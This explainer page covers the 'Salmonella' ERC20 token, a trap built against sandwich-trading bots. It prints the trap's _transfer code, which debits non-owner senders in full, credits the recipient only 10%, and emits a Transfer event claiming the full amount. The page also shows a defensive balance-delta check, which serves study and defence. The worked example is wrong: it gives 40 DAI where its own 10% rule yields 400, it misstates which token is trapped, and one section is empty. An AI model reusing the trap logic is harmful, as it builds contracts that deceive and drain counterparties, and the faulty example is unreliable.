Salmonella Contract

Wrecking sandwich traders for fun and profit

The premise of the Salmonella contract is very simple. It’s a regular ERC20 token, which behaves exactly like any other ERC20 token in typical use cases. However, it has some special logic to detect when anyone other than the specified owner is transacting it, and in these situations it only returns 10% of the specified amount - despite emitting event logs which match a trade of the full amount.

Source: https://github.com/Defi-Cartel/salmonella

The contract owner can be set, and the change is in the _transfer function, which updates the sender and recipient balances.

ERC20 Contract

function _transfer(address sender, address recipient, uint256 amount) internal virtual {
  require(sender != address(0), "ERC20: transfer from the zero address");
  require(recipient != address(0), "ERC20: transfer to the zero address");
  _beforeTokenTransfer(sender, recipient, amount);
  uint256 senderBalance = _balances[sender];
  require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
  // The sender is debited and the recipient credited with the same amount
  _balances[sender] = senderBalance - amount;
  _balances[recipient] += amount;
  emit Transfer(sender, recipient, amount);
}

Source (line 211-222): https://github.com/OpenZeppelin/openzeppelin-contracts/blob/master/contracts/token/ERC20/ERC20.sol

Salmonella Contract

function _transfer(address sender, address recipient, uint256 amount) internal virtual {
  require(sender != address(0), "ERC20: transfer from the zero address");
  require(recipient != address(0), "ERC20: transfer to the zero address");
  uint256 senderBalance = _balances[sender];
  require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
  if (sender == ownerA || sender == ownerB) {
    _balances[sender] = senderBalance - amount;
    _balances[recipient] += amount;
  } else {
    _balances[sender] = senderBalance - amount;
    uint256 trapAmount = (amount * 10) / 100;
    _balances[recipient] += trapAmount;
  }
  emit Transfer(sender, recipient, amount);
}

Source: https://github.com/Defi-Cartel/salmonella

Difference

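The Salmonella version adds uint256 trapAmount = (amount * 10) / 100; to the _transfer function. When the sender is not ownerA or ownerB, the sender is still debited the full amount, but the recipient is credited only 10% of it, and the other 90% of the tokens get burned.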
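A defensive check against this kind of token, as an added example that is not part of the Salmonella repository or the original page: a receiving contract compares its own balance before and after the transfer instead of trusting the Transfer event. The names BalanceDeltaGuard and pullExact are hypothetical, and the token is assumed to return a bool from transferFrom as OpenZeppelin's ERC20 does.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Minimal ERC20 surface needed for the check.
interface IERC20 {
    function balanceOf(address account) external view returns (uint256);
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

// Hypothetical receiver; the name and layout are assumptions for this example.
contract BalanceDeltaGuard {
    // Pulls `amount` of `token` from the caller and reverts unless this
    // contract's balance rose by exactly `amount`.
    //
    // The Transfer event is deliberately not consulted: the Salmonella
    // _transfer emits the full amount while crediting a non-owner's
    // recipient with only 10% of it.
    function pullExact(IERC20 token, uint256 amount) external returns (uint256 received) {
        uint256 balanceBefore = token.balanceOf(address(this));

        // Assumption: the token returns a bool, as OpenZeppelin's ERC20 does.
        require(token.transferFrom(msg.sender, address(this), amount), "transferFrom failed");

        // Solidity 0.8 checked arithmetic reverts if the balance went down.
        received = token.balanceOf(address(this)) - balanceBefore;

        // With the Salmonella logic, `received` would be amount / 10 here,
        // so the whole transaction reverts instead of accepting the shortfall.
        require(received == amount, "credited amount != requested amount");
    }
}
```

The check relies on balanceOf reflecting the real _balances mapping, which holds for the contract shown above; a token that also falsifies balanceOf would need a different test, such as simulating a round trip before trading.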

Example

  • You want to swap 100 UNI for DAI.
  • You send 100 UNI to the Uniswap pool (contract).
  • 100 UNI = 4000 DAI.
  • With the Salmonella contract, 90% of the DAI that was supposed to be sent to you gets burned, and you receive 40 DAI.

Sandwich attacks

Further reading

  • Paper on sandwich attacks Source: https://medium.com/coinmonks/demystify-the-dark-forest-on-ethereum-sandwich-attacks-5a3aec9fa33e
